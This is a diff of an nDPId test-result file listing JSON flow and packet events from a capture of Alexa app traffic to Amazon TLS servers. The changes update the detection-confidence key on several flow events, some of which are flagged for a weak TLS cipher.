00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1168,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976082723,"flow_last_seen":1490976082723,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976082723,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1168,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":1,"flow_last_seen":1490976082723,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976082723,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8n\/hAAEAGdDKsECrYNu8YuoUFAbsbksFnAAAAAKAC\/\/9eHgAAAgQFtAQCCAoA9l6fAAAAAAEDAwg="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1169,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976082964,"flow_last_seen":1490976082964,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976082964,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1169,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":1,"flow_last_seen":1490976082964,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976082964,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8NvRAAEAG3TasECrYNu8YuoUGAbttlGhMAAAAAKAC\/\/9lHQAAAgQFtAQCCAoA9l64AAAAAAEDAwg="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1170,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":2,"flow_last_seen":1490976082969,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976082969,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwftZAAOcG7l827xi6rBAq2AG7hQU1exHsG5LBaHASH\/6SVwAAAgQFtAEDAwY="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1171,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":1490976082973,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976082973,"pkt":"AMDKkaPvePiC0\/vCCABFAAAon\/lAAEAGdEWsECrYNu8YuoUFAbsbksFoNXsR7VAQAVfcyAAA"} -00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976082723,"flow_last_seen":1490976082975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976082975,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00883{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1172,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976082723,"flow_last_seen":1490976082975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976082975,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1173,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":2,"flow_last_seen":1490976083245,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976083245,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwWypAAOcGEgw27xi6rBAq2AG7hQaUlSPBbZRoTXASH\/4ogAAAAgQFtAEDAwY="} -00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1176,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082723,"flow_last_seen":1490976083245,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976083245,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1176,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082723,"flow_last_seen":1490976083245,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":415,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976083245,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1177,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":1490976083337,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976083337,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoNvVAAEAG3UmsECrYNu8YuoUGAbttlGhNlJUjwlAQAVdy8QAA"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976085644,"flow_last_seen":1490976085644,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976085644,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1195,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":1,"flow_last_seen":1490976085644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976085644,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8I8hAAEAGIyesECrYNF7ohrKHAbtpd3wLAAAAAKAC\/\/9ZswAAAgQFtAQCCAoA9l\/DAAAAAAEDAwg="} @@ -457,18 +457,18 @@ 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1201,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":2,"flow_last_seen":1490976085970,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976085970,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwHsZAAOcGgTQ0XuiGrBAq2AG7sofzK0GgaXd8DHASH\/6hqwAAAgQFtAEDAwY="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1202,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":2,"flow_last_seen":1490976085970,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976085970,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwdw1AAOcGKO00XuiGrBAq2AG7sojjQR2VxkD2SnASH\/7+lwAAAgQFtAEDAwY="} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1203,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":1490976085977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976085977,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoI8lAAEAGIzqsECrYNF7ohrKHAbtpd3wM8ytBoVAQAVfsHAAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1204,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085644,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1204,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085644,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1205,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976085978,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoqZ5AAEAGnWSsECrYNF7ohrKIAbvGQPZK40EdllAQAVdJCQAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085829,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1206,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085829,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976085978,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1207,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_packet_id":2,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1490976085978,"pkt":"ePiC0\/vCAMDKkVoBCABFEAAoAABAAD0Gmy7AqAsBrBAq2B+QliIAAAAAp\/J0hVAUAAA7FAAAAAAAAAAA"} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1208,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085644,"flow_last_seen":1490976086218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1208,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":80,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085644,"flow_last_seen":1490976086218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45703,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1210,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":2,"flow_last_seen":1490976086218,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976086218,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwSbFAAOcGVkk0XuiGrBAq2AG7soktOgAj+XDMt3ASH\/7IcwAAAgQFtAEDAwY="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1211,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":2,"flow_last_seen":1490976086218,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976086218,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwHTJAAOcGgsg0XuiGrBAq2AG7sosHecze3XmCE3ASH\/6IEgAAAgQFtAEDAwY="} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1212,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085829,"flow_last_seen":1490976086218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1212,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":81,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085829,"flow_last_seen":1490976086218,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086218,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45704,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1216,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":1490976086219,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976086219,"pkt":"AMDKkaPvePiC0\/vCCABFAAAok2JAAEAGs6CsECrYNF7ohrKJAbv5cMy3LToAJFAQAVcS5QAA"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1218,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":1490976086220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976086220,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo3c9AAEAGaTOsECrYNF7ohrKLAbvdeYITB3nM31AQAVfSgwAA"} -00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085832,"flow_last_seen":1490976086244,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976086244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085832,"flow_last_seen":1490976086648,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086648,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1224,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976085832,"flow_last_seen":1490976086244,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976086244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1230,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":82,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976085832,"flow_last_seen":1490976086648,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976086648,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45705,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1243,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_packet_id":2,"flow_last_seen":1490976086880,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976086880,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8m\/ZAAEAGPiOsECrYCsl+8Z0yH5CNbMQpAAAAAKAC\/\/93zQAAAgQFtAQCCAoA9mBAAAAAAAEDAwg="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976088605,"flow_last_seen":1490976088605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976088605,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45709,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1266,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":86,"flow_packet_id":1,"flow_last_seen":1490976088605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976088605,"pkt":"AMDKkaPvePiC0\/vCCABFAAA81ixAAEAGcMKsECrYNF7ohrKNAbu9HLbAAAAAAKAC\/\/\/KKQAAAgQFtAQCCAoA9mDsAAAAAAEDAwg="} @@ -477,9 +477,9 @@ 